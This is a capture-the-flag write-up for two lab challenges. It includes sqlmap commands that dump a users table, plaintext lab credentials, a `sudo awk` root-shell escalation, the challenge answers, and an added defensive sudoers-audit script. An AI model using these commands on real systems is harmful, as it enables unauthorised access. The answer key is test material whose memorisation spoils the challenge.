# Web Range-121-122

## Challenge 121

## Challenge 122

![image](https://hackmd.io/_uploads/H19cYsGYgg.png)

* Rustscan
    * ![image](https://hackmd.io/_uploads/rJU7csfFxx.png)
* Nmap
    * ![image](https://hackmd.io/_uploads/SJ4OjjfFll.png)
* Nothing on FTP
    * ![image](https://hackmd.io/_uploads/BkMMiszteg.png)
* The web service was not reachable at first. A closer look at the Nmap scan result showed that it only allows HEAD, and that the request must send the header `Host: 127.0.0.1`
    * ![image](https://hackmd.io/_uploads/S1FQVhfYlg.png)
* Using `curl` with the method set to HEAD and a customized request, I got a response and found a path, `index.php`
    * ![image](https://hackmd.io/_uploads/ryVTN2ftlx.png)
    * ![image](https://hackmd.io/_uploads/HJm-BnMYxg.png)
    * ![image](https://hackmd.io/_uploads/HyQMB2GKgx.png)
* It is a login page called `MaxMinter`, but not a CMS, and there is no CVE, so try registering a user
    * ![image](https://hackmd.io/_uploads/r1EDU2Mtxx.png)
* Scanned paths with `feroxbuster`; this also has to use HEAD with the custom header
    * ![image](https://hackmd.io/_uploads/S1Bku3zFxe.png)

```zsh
feroxbuster -u http://10.10.1.57 -H "Host: 127.0.1.1" -X HEAD
```

* Guessed a test account at random
    * ![image](https://hackmd.io/_uploads/BktKO2GYxl.png)
    * `test@test.com:123456`
* But it does not seem able to do much
    * ![image](https://hackmd.io/_uploads/rygz0_2Gtel.png)
* There is a feature to Request Remote Access, but for this user it says permission denied
    * ![image](https://hackmd.io/_uploads/HyWItnftlx.png)
    * ![image](https://hackmd.io/_uploads/HyDpKnzKel.png)
* OK, both the login and register pages have SQLi
    * ![image](https://hackmd.io/_uploads/rJmxZTftxx.png)

```zsh
sqlmap -r login_req --level 5 --risk 3 --batch --dbs
sqlmap -r login_req --level 5 --risk 3 --batch -D maxminter --tables
sqlmap -r login_req --level 5 --risk 3 --batch -D maxminter -T users --columns --dump
```

* Got the admin credential, and login was successful
    * ![image](https://hackmd.io/_uploads/SkprXaMFlg.png)
    * ![image](https://hackmd.io/_uploads/BkiTS6GFxl.png)
    * `admin@gmail.com:asd%$gasd23_`
    * ![image](https://hackmd.io/_uploads/SJejXTMYee.png)
* About Remote Access: it looks like we need to find a user with the RAU permission, because even we ourselves do not have it
    * ![image](https://hackmd.io/_uploads/Hk7zVTfYxx.png)
    * ![image](https://hackmd.io/_uploads/rko8S6GFxg.png)
* Jackson has the RAU permission; after logging in and requesting RAU, I got a set of credentials
    * ![image](https://hackmd.io/_uploads/S1ZKSpztxg.png)
    * ![image](https://hackmd.io/_uploads/HJQfUazFxe.png)
    * `jackson:ABfg34$#@_W`
* Shell as jackson via ssh
    * ![image](https://hackmd.io/_uploads/BkRHU6MYxx.png)
    * ![image](https://hackmd.io/_uploads/ByoYIpzKee.png)
* Privilege escalation with `awk`
    * ![image](https://hackmd.io/_uploads/Bka3U6fYxx.png)
    * https://gtfobins.github.io/gtfobins/awk/#sudo
    * ![image](https://hackmd.io/_uploads/SydyvpGtlx.png)

```zsh
sudo awk 'BEGIN {system("/bin/sh")}'
```

* Proof
    * ![image](https://hackmd.io/_uploads/SJiBwpfYle.png)

## Answer

* Challenge 121: `2`
* Challenge 122: `q22L32WL`
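
The `sudo awk` step in this writeup works because a sudoers rule hands a shell-capable binary to a low-privileged user. The audit script below is an added example from the defender's side, not part of the original writeup; the `SHELL_CAPABLE` subset, the `audit_sudoers` function and the sample sudoers fragment are constructed assumptions.

```python
import os
import re

# Assumption: illustrative subset of binaries that GTFOBins documents as able
# to run commands when allowed through sudo; extend it for your environment.
SHELL_CAPABLE = {"awk", "gawk", "mawk", "find", "vim", "less", "perl", "python3", "env"}
RULE = re.compile(r"^(\S+)\s+[^=\s]+\s*=\s*(.+)$")  # who host = command list
RUNAS = re.compile(r"^\([^)]*\)\s*")                # (root), (ALL : ALL)
TAG = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV)\s*:\s*")
SKIP = ("#", "Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")


def audit_sudoers(text):
    """Return (user, command, nopasswd, reason) for each risky grant."""
    findings = []
    for line in text.replace("\\\n", " ").splitlines():
        line = line.strip()
        m = None if line.startswith(SKIP) else RULE.match(line)
        if not m:
            continue  # comments, Defaults, aliases (not expanded here), blanks
        who, spec = m.groups()
        nopasswd = False
        # Split on commas that are not inside a (runas, list) group.
        for item in re.split(r",\s*(?![^()]*\))", spec):
            item = RUNAS.sub("", item.strip())
            while (t := TAG.match(item)):
                if t.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = t.group(1) == "NOPASSWD"  # tags carry forward
                item = item[t.end():]
            if not item or item.startswith("!"):
                continue
            cmd = item.split()[0]
            if cmd == "ALL":
                findings.append((who, cmd, nopasswd, "unrestricted sudo"))
            elif os.path.basename(cmd) in SHELL_CAPABLE:
                findings.append((who, cmd, nopasswd, "binary can spawn a shell"))
    return findings


# Constructed sample: the target's real sudoers rule appears only in a screenshot.
SAMPLE = """\
Defaults env_reset
%wheel  ALL=(ALL) ALL
jackson ALL=(root) NOPASSWD: /usr/bin/awk, /usr/bin/systemctl restart nginx
backup  ALL=(root) /usr/bin/systemctl restart backup, PASSWD: /usr/bin/find
"""

if __name__ == "__main__":
    print(*audit_sudoers(SAMPLE), sep="\n")
```

Feed it the contents of `/etc/sudoers` and each file under `/etc/sudoers.d/`; aliases and `#include` lines are not expanded, so review those separately.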